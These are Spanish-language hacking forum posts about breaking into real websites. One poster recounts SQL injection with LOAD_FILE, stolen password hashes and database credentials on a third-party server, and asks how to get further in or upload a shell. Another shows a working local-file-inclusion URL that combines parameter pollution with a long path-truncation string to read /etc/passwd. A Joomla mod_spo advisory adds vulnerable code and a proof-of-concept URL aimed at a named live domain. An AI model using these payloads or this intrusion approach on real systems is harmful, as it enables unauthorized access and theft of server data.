alguien sabe explotar HPP en una aplicacion PHP? se que en php es Parameter precedence igual a last occurrence pero

alguien sabe o tiene ejmplos de como explotarla?

Saludos Comunidad y.... Hackers,noobs,h4x0rs,CEH n bla bla bla

Para ir al grano tengo una SQL Injection en X pagina web con permisos de lectura es de mysql y bueno esta con magic_quotes asi que subirle un archivo naaaaah...

La aplicacion tiene WordPress y Joomla version exacta ni idea pero tiene por ejemplo

www.xxx.com/reforma/administrator
www.xxx.com/xxxx/wp-admin/xxxx
www.xxx.com/financiero/administrator

entonces hay vemos que tiene como que subcarpetas y en totalidad varios joomla cada uno con su plugin y cosas asi pero todo esta muy bien lo he analizado automaticamente I O U manualmente, exploits busqueda por aqui y por alla bla bla bla

hasta que me di con una carpeta que si bien tenia un joomla antiguo y era www.xxx.com/biblioteca/xxx.php?id=whateveruwant  

jaja total hay tengo la SQL Injection y ver las cosas que tiene nada es pues mas informativa y me importa entrar al servidor entre las cosas vi los USERS y PASSWORDS pero claro cifrado y no busque por aqui  y por alla y esos hash no tienen perdon de nadie e intentar desencriptarlos bueno si alguien me presta algun core con CUDA y bla bla feliz estoy jaja caso contrario tenemos la "LFI" digamos.. gracias al Load_File en la SQL Injection

He podido lograr ver archivos pero como que de mi coco ando medio seco y ayudenme a ver que archivos deberia estar olvidandome claro ya tengo las claves de sus BD y eso con una simple revisada al Index.php etc etc pero no tiene puerto abierto soooo no se me ocurre otra forma I O U ideas jaja

Tienen worpress, Joomla, Mysql y Oracle que archivos podria ver y con los datos que les puse para lograr entrar  mas o incluso lograr subir shell....

Saludos...

hola espero peudan ayudarme o entiendan del tema tengo esto en X web afectada es un LFI

Al intentar un simple ../../etc/passwd me tira este error

Warning: require_once(lang/../etc/passwd.php) [function.require-once]: failed to open stream: No such file or directory in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxx.111.xxx/single.php on line 6

muy seguramente tiene que tener esto algo como esto
" include($_GET['page'] . '.php'); " en el codigo donde permite solo .php

luego intente con un NULL bye %00 pero estaba tambien con filtro dejandomelo en \0 asi que decidi usar "fuerza automatizada" jajaja y me saco esto.


http://webafectada.com/123123/?lang=de&lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.



con eso pude ver el passwd y ya no pedia el .php al ultimo como extension me parecio algo extraño y mire el error a ver si lo logran entender:


Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /etc/passwd:12) in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxxxxx/header.php on line 3

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /etc/passwd:12) in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxx.1111.xxx/header.php on line 3


asi logre ver el /etc/passwd pero deseo saber PORQUE? que quiere decir eso? y porque cuando quiero ver otros archivos mas que todo fuera del etc o fuera de su directorio no logro verlo ellos tienen un PHPMYADMIN y no logro verlos aun sabiendo el path completo.

Si alguien puede entenderlo mejor el porque de ese error me ayudaria mucho  

alguien podria volverlo a subir ? como ya sabran megaupload............ 

Este complemento del Joomla MOD_SPO tiene LFI local file inclusion se pueden llamar archivos del servidor...


Vulnerable Code:

$s_lang =& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');


hace include de lo que llames con ciertos parámetros... la ultima version que es la 1.5.16 y todas las 1.5.x tambien lo son.


se puede resolver facilmente agregandole un str_replace o con permisos de lectura desde el htaccess (este lo recomiendo)

un ejemplo real:

http://www.europeancartransport.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email

• =sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd%00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

el nullbyte es junto pero blogger no me deja ponerlo el error es en la variable:

spo_site_lang=

__________


Alfredo Arauz (Security Expert - IT Ecuador) encontró la vulnerabilidad en una página web yo encontré el code vulnerable y generé el POC.

Fuente: http://seguridadblanca.blogspot.com/2011/07/simple-page-option-lfi.html

Saludos
Dr.White